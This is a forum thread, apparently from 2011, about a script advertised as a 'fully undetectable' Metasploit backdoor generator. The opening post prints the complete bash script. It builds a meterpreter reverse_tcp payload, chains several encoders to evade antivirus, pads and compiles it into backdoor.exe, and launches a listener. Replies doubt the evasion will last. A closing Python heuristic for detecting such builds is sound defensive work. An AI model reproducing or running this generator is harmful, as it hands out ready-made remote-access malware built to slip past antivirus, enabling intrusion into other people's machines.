Author Topic: Fully Undetectable Backdoor generator for Metasploit  (Read 3428 times)


Offline noob

  • Knight
  • **
  • Posts: 185
  • Reputation: +26
Fully Undetectable Backdoor generator for Metasploit
« on: December 16, 2011, 06:23:56 pm »


Security Labs experts from India launched an automated anti-virus and firewall bypass script. It's a modified and stable version made to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation of how it works:
 In order to be able to compile the generated payload we must install the following packages: Mingw32 gcc, which you can install with:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

 After the installation we must move our shell script, Vanish.sh, to the default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended seed number = 7000 and number of encodes = 14.
 Note: by default the script generates a reverse TCP payload, but you can change it with some modifications in the script [vanish.sh]. The virus scan report of the backdoor shows that it's almost undetectable by most antivirus programs.
Code:
#!/bin/bash
# No check for msfpayload, msfcli etc.: run this from the Metasploit framework
# directory so that ./msfpayload, ./msfencode and ./msfcli resolve.
echo "************************************************************"
echo "    Fully Undetectable Metasploit Payload generator Beta    "
echo "        Original Concept and Script by Astr0baby            "
# Thanks to astr0baby ;)
echo "     Stable Version of Script is Edited by Vanish3r         "
echo "    Video Tutorial by Vanish3r - www.securitylabs.in        "
echo " Powered by TheHackerNews.com and securitylabs.in           "
echo "************************************************************"
# run as root
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi
# short pause (the original redirected to a stray file literally named "nul")
ping localhost -c 5 > /dev/null

# Giving a fresh new start, so remove old junk
rm -rf seclabs
# if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then
# else echo "Please install by Command: apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils"
# echo "exiting.....";  exit
# fi
echo "Network devices on your computer:"
tr -s ' ' < /proc/net/dev | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "Which interface to use?  \c"
read interface
echo -e "What port number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "How many times do you want to encode? 1-20 : \c"
read enumber
# Get OS name
OS=$(uname)
IP="" # store IP (the original had the typo IO="")
case $OS in
   Linux) IP=$(ifconfig "$interface" | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}');;
   *) IP="Unknown";;
esac
echo "Current IP is : $IP"
ping localhost -c 5 > /dev/null
# Generate the payload, pass it through the encoder chain, and emit it as a C array
./msfpayload windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$port" EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c "$enumber" -t raw | ./msfencode -e x86/jmp_call_additive -c "$enumber" -t raw | ./msfencode -e x86/call4_dword_xor -c "$enumber" -t raw |  ./msfencode -e x86/shikata_ga_nai -c "$enumber"  > test.c
mkdir seclabs
mv test.c seclabs
cd seclabs
# Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
# $seed random numbers as quoted string literals, used only as filler data
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1 | cut -d " " -f2 | head -n "$seed" >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo  ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1 | cut -d " " -f2 | head -n "$seed" >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
# Cleanup of junk useless files :P
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

# compiling..
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe backdoor.exe
filex=$(ls -ct1 | head -n 1)
sumx=$(sha1sum "$filex")
echo "$filex" "...generated in seclabs subfolder"
echo "$filex" "sha1checksum is .." "$sumx"
strip --strip-debug "$filex"
cd ..
echo "      starting the meterpreter listener..."
sleep 2
ping localhost -c 5 > /dev/null
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$port" E


Offline FuyuKitsune

  • Knight
  • **
  • Posts: 296
  • Reputation: +21
Re: Fully Undetectable Backdoor generator for Metasploit
« Reply #1 on: December 16, 2011, 08:23:06 pm »
So a FUD Metasploit crypter? Nice but I think crypters shouldn't be released so publicly. It'll be detected in a few weeks.

btw, does Jotti distribute samples to AV vendors?

Online Kulverstukas

  • Administrator
  • Legend
  • *
  • Posts: 3810
  • Reputation: +332
  • Gender: Male
  • Motherflipper
Re: Fully Undetectable Backdoor generator for Metasploit
« Reply #2 on: December 16, 2011, 09:35:59 pm »
btw, does Jotti distribute samples to AV vendors?
Yes. It's there in their policy.

Online ande

  • Administrator
  • Legend
  • *
  • Posts: 2125
  • Reputation: +165
Re: Fully Undetectable Backdoor generator for Metasploit
« Reply #3 on: December 17, 2011, 06:20:54 pm »
Like already mentioned, unless this is completely polymorphic, this is going to be not so FUD in a few weeks.

Offline Tsar

  • Peasant
  • *
  • Posts: 132
  • Reputation: +11
  • turing-recognizable
Re: Fully Undetectable Backdoor generator for Metasploit
« Reply #4 on: December 17, 2011, 08:45:16 pm »
Like already mentioned, unless this is completely polymorphic, this is going to be not so FUD in a few weeks.

And even then if the code is out, there are ways to detect polymorphic code.

Online m0rph

  • VIP
  • Knight
  • *
  • Posts: 323
  • Reputation: +53
  • Master Debator
Re: Fully Undetectable Backdoor generator for Metasploit
« Reply #5 on: December 18, 2011, 04:42:07 pm »
Yeah I'm not impressed. It just gives you an interface to select how many times you want to encode a reverse tcp meterpreter payload, adds some C code that sets a void pointer to some random garbage, cross compiles the result, and opens the metasploit client. Basically...this is just another way for noobs to do even more noob things with a noob script, and not learn anything.

The only reason this would create something FUD is because of the amount of times it will encode using different encoders. I don't know if traffic between meterpreter and metasploit is encrypted (with something like TLS), but if it's not then any heuristic based anti-virus/IDS/IPS would still be able to stop this. Even more so if the aforementioned systems were capable of stateful packet inspection.
while( !(succeed = try() ) );
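The replies from ande, Tsar and m0rph make the defender's point: once a generator like this is public, its fixed artifacts become signatures, regardless of how many encoder passes it stacks. As an added example (not part of any post in this thread and not the script's own code), the Python below scans a binary blob for two such artifacts: a long contiguous run of ASCII digits (the ufs[] and tap[] string literals the script emits concatenate into one digit string in the compiled binary, under ordinary C string-literal concatenation) and a high-entropy window (the multiply-encoded shellcode). The sample input is constructed, not a real payload or PE; the 1024-byte window and both thresholds are assumptions to be tuned on a clean corpus.

```python
import math
import random

# Assumed thresholds: tune on a corpus of known-good binaries before relying on them.
DIGIT_RUN_THRESHOLD = 2048   # bytes of contiguous '0'-'9'; legitimate binaries rarely carry this much
ENTROPY_WINDOW = 1024        # bytes per window
ENTROPY_THRESHOLD = 7.5      # bits per byte; encoded shellcode sits near 8, text near 4-5


def shannon_entropy(chunk: bytes) -> float:
    """Bits of entropy per byte of the chunk (0.0 for empty input)."""
    if not chunk:
        return 0.0
    counts = [0] * 256
    for b in chunk:
        counts[b] += 1
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def longest_digit_run(data: bytes) -> int:
    """Length of the longest contiguous run of ASCII digit bytes."""
    best = cur = 0
    for b in data:
        if 0x30 <= b <= 0x39:
            cur += 1
            best = max(best, cur)
        else:
            cur = 0
    return best


def max_window_entropy(data: bytes, window: int = ENTROPY_WINDOW) -> float:
    """Highest entropy over non-overlapping windows (the whole blob if it is shorter)."""
    if len(data) < window:
        return shannon_entropy(data)
    return max(shannon_entropy(data[i:i + window])
               for i in range(0, len(data) - window + 1, window))


def scan_sample(data: bytes) -> dict:
    """Return the measured artifacts and which heuristic flags fired."""
    run = longest_digit_run(data)
    ent = max_window_entropy(data)
    flags = []
    if run >= DIGIT_RUN_THRESHOLD:
        flags.append("digit-padding")
    if ent >= ENTROPY_THRESHOLD:
        flags.append("high-entropy-window")
    return {"digit_run": run, "max_window_entropy": round(ent, 2), "flags": flags}


def build_constructed_sample(seed: int = 7000) -> bytes:
    """Constructed stand-in for the generator's output: a pseudo-random blob playing
    the role of the encoded payload, followed by the digit padding that the script's
    'head -n $seed' loop over shuffled numbers 1..10000 produces. Not a real PE and
    not real shellcode; the 'MZ' prefix is only cosmetic."""
    rng = random.Random(42)
    encoded = bytes(rng.getrandbits(8) for _ in range(4096))
    numbers = list(range(1, 10001))
    rng.shuffle(numbers)
    padding = "".join(str(n) for n in numbers[:seed]).encode("ascii")
    return b"MZ" + b"\x00" * 62 + encoded + padding


def build_benign_sample() -> bytes:
    """Constructed benign input: ordinary program text with a few isolated digits."""
    text = b"Hello, world. This is ordinary program text with version 1.2.3 inside.\n"
    return text * 40


if __name__ == "__main__":
    print("generator-like:", scan_sample(build_constructed_sample()))
    print("benign:        ", scan_sample(build_benign_sample()))
```

The entropy check on its own is a weak signal (compressed resources and encrypted data score just as high), which is why the sample also looks for the generator-specific padding artifact; real triage would combine such heuristics with the sandbox and submission pipelines the thread mentions, which is exactly how a "FUD" build ends up detected within weeks.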
